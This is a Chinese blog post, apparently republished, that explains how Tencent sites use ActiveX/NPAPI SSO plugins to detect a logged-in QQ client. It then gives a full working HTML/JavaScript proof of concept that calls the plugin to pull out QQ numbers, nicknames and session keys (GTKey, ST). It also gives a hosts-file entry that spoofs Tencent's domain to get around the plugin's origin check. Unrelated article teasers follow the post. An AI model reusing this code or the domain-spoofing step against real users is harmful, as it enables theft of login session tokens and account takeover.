腾讯的网站如何检测到你的 QQ 已经登录?

腾讯的网站如何检测到你的 QQ 已经登录?

http://www.lovelucy.info/tencent-sso.html

在 QQ 已经登录的情况下,手动输入网址打开 QQ 邮箱 或者 QQ 空间 等腾讯网站,可以看到网页已经检测到本地 QQ 客户端已经登录,于是用户可以很方便地一键登录网站而不必再输入用户名密码。这实际上是典型的异构系统单点登录 SSO(single-sign-on)技术。网页怎么会知道我登录的 QQ 号码?腾讯是如何实现的呢?

www.zeeklog.com  - 腾讯的网站如何检测到你的 QQ 已经登录?
www.zeeklog.com  - 腾讯的网站如何检测到你的 QQ 已经登录?

网上有很多猜测,比如——

  • QQ 登录时在本地某地方存登录 ID 信息(Cookie 或文件),用 js 读,然后去服务器认证。但是现在的浏览器一般有沙箱功能,js 无法读到登录 ID;而且在清空 Cookie 后依然起作用。
  • 以 IP、CPU ID、硬盘 ID 等硬件设备 hash 做唯一标识,QQ 登录时在服务器记录此信息,js 验证。感觉这样依赖环境过多,QQ 不太可能采用此方法。
  • QQ 启动某端口监听,js 连接此端口。但是用 netstat 查看后,QQ 并没有监听端口。

有这么一个神奇的链接, 你一点开,它就检测到你登录了 QQ。通过查看页面源代码,我们可以发现一个文件,这段代码中,描述了使用 ActivexObject 浏览器插件的过程,于是一切了然。

可是 ActiveX 是 IE 的插件呀,我们使用 Chrome 或者 FireFox 也是可以直接登录的,这是怎么回事呢?

原来,QQ 使用了历史很悠久的 NPAPI(Netscape Plugin Application Programming Interface)接口。NPAPI 几乎支持所有主流浏览器,包括 FireFox、Chrome、Opera(IE 从 5.5 后停止支持 NPAPI,转而使用 ActiveX)。

打开 chrome://plugins/ 我们可以发现自动登录的有关插件,而在路径 C:\Program Files (x86)\Common Files\Tencent\TXSSO 下就可以找到关于 SSO 的相关动态链接库。

www.zeeklog.com  - 腾讯的网站如何检测到你的 QQ 已经登录?

np 插件一般命名都会加np前缀 如 QQ 的这个 npSSOAxCtrlForPTLogin.dll,只要按照,放在浏览器会加载的地方,用的时候写个标签就可以在 js 里面调用了。于是跨浏览器(无视 IE)的插件开发变得相当可行。运行在 NPAPI 插件中的代码拥有当前用户的所有权限,不在沙箱中运行,所以它的扩展程序在被 Chrome 网上应用店接受前要求人工审核。

有点不怀好意的想法开始萌生,我自己的网站能否借用这个插件来检测用户的 QQ 登录呢?写个页面测试一下。    <!DOCTYPE html><html><head><metacharset="utf-8"><title>Tencent SSO Testing</title></head><body><script>var g_vOptData;var mylocation= "xui.ptlogin2.qq.com/cgi-bin1/qlogintest.html";var pt = { ishttps: false, low_login: 0, keyindex: 9, init: function() {  pt.ishttps = /^https/.test(mylocation);  //if (navigator.mimeTypes["application/nptxsso"]) {  var B = document.createElement("embed");  B.type = "application/nptxsso";  B.style.width = "0px";  B.style.height = "0px";  document.body.appendChild(B);  pt.sso = B }};pt.init(); try { if (window.ActiveXObject) {  q_hummerQtrl = new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");  var A = q_hummerQtrl.CreateTXSSOData();  q_hummerQtrl.InitSSOFPTCtrl(0, A);  g_vOptData = q_hummerQtrl.CreateTXSSOData() } hummer_loaduin();} catch(B) { alert(/create ActiveXObject failed/)} function hummer_loaduin(){ if (window.ActiveXObject) {  var Y = q_hummerQtrl.DoOperation(1, g_vOptData);  if (null == Y) {   return  }  try  {   var T = Y.GetArray("PTALIST");   var c = T.GetSize();   var X = "";   for (var d = 0; d < c; d++){var E =T.GetData(d);var a =E.GetDWord("dwSSO_Account_dwAccountUin");var J ="";var O =E.GetByte("cSSO_Account_cAccountType");var b =a;if (O ==1){try{J =E.GetArray("SSO_Account_AccountValueList");b =J.GetStr(0)}catch(Z){}}var Q =0;try {Q =E.GetWord("wSSO_Account_wFaceIndex")}catch(Z){Q =0}var S ="";try {S =E.GetStr("strSSO_Account_strNickName")}catch(Z){S =""}var F =E.GetBuf("bufGTKey_PTLOGIN");var G =E.GetBuf("bufST_PTLOGIN");var N ="";var A =G.GetSize();for(var W =0; W < A; W++){var B =G.GetAt(W).toString("16");if (B.length ==1){B ="0"+ B}N +=B}var M ={uin: a,name: b,type: O,face: Q,nick: S,key: N};var str ="QQinfo\r\n"+"uin:"+ M['uin']+"\r\n"+"name:"+M['name']+"\r\n"+"type:"+M['type']+"\r\n"+"face:"+M['face']+"\r\n"+"nick:"+M['nick']+"\r\n"+"key:"+M['key']+"\r\n";alert(str);q_aUinList[d]=M}}catch(Z){}}else{try {var M =pt.sso;var L =M.InitPVA();if (L !=false){var I =M.GetPVACount();for(var W =0; W < I; W++){var C =M.GetUin(W);var D =M.GetAccountName(W);var K =M.GetFaceIndex(W);var U =M.GetNickname(W);var P =M.GetGender(W);var V =M.GetUinFlag(W);var f =M.GetGTKey(W);var R =M.GetST(W);}var str ="QQinfo\r\n"+"uin:"+ C +"\r\n"+"name:"+D+"\r\n"+"face:"+K +"\r\n"+"nick:"+U+"\r\n"+"key:"+f+"\r\n";alert(str);}}catch(Z){}} }</script></body></html>

本地打开此页面,create ActiveXObject 失败。腾讯必然在 dll 中就对域名进行了限制,网页是无法篡改的。于是修改本地host文件,加一条:

127.0.0.1 xui.ptlogin2.qq.com

再用 xui.ptlogin2.qq.com 这个域名去访问本地的这个 html,果然,可以正常拿到 QQ 相关信息。

PS. Chrome 浏览器自带的开发者工具有一个功能可以格式化被压缩的 js 代码,十分好用。废话不多说,有图说明一切——

www.zeeklog.com  - 腾讯的网站如何检测到你的 QQ 已经登录?

参考链接:

Read more

深入理解 Proxy 和 Object.defineProperty

在JavaScript中,对象是一种核心的数据结构,而对对象的操作也是开发中经常遇到的任务。在这个过程中,我们经常会使用到两个重要的特性:Proxy和Object.defineProperty。这两者都允许我们在对象上进行拦截和自定义操作,但它们在实现方式、应用场景和灵活性等方面存在一些显著的区别。本文将深入比较Proxy和Object.defineProperty,包括它们的基本概念、使用示例以及适用场景,以帮助读者更好地理解和运用这两个特性。 1. Object.defineProperty 1.1 基本概念 Object.defineProperty 是 ECMAScript 5 引入的一个方法,用于直接在对象上定义新属性或修改已有属性。它的基本语法如下: javascript 代码解读复制代码Object.defineProperty(obj, prop, descriptor); 其中,obj是目标对象,prop是要定义或修改的属性名,descriptor是一个描述符对象,用于定义属性的特性。 1.2 使用示例 javascript 代码解读复制代码//

By Ne0inhk

Proxy 和 Object.defineProperty 的区别

Proxy 和 Object.defineProperty 是 JavaScript 中两个不同的特性,它们的作用也不完全相同。 Object.defineProperty 允许你在一个对象上定义一个新属性或者修改一个已有属性。通过这个方法你可以精确地定义属性的特征,比如它是否可写、可枚举、可配置等。该方法的使用场景通常是需要在一个对象上创建一个属性,然后控制这个属性的行为。 Proxy 也可以用来代理一个对象,但是相比于 Object.defineProperty,它提供了更加强大的功能。使用 Proxy 可以截获并重定义对象的基本操作,比如访问属性、赋值、函数调用等等。在这些操作被执行之前,可以通过拦截器函数对这些操作进行拦截和修改。因此,通过 Proxy,你可以完全重写一个对象的默认行为。该方法的使用场景通常是需要对一个对象的行为进行定制化,或者需要在对象上添加额外的功能。 对比 以下是 Proxy 和 Object.defineProperty 的一些区别对比: 方面ProxyObject.defineProperty语法使用 new Proxy(target,

By Ne0inhk